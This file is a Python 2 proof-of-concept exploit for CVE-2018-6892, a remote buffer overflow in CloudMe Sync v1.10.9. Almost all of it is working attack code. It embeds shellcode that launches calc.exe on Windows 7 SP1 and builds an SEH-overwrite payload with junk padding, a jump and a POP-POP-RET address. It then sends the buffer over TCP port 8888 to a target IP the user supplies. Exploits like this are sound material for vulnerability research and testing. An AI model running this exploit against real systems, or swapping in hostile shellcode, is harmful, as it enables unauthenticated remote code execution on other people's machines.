CVE-2018-6892.py

import socket,struct

print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


ip=raw_input('[+] CloudMe Target IP> ') 

nseh="\xEB\x06"+"\x90"*2                #JMP
seh=struct.pack('<L',0x61e7b7f6)        #POP,POP RET 
junk="A"*2232+nseh+seh+sc+"B"*5600
payload=junk+nseh+seh+sc

def PwnMe(ip,payload):
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)        
    s.connect((ip,8888))
    s.send(payload)
    print 'Sending buffer overflow packetz'
    raw_input()


if __name__ == '__main__':
    PwnMe(ip,payload)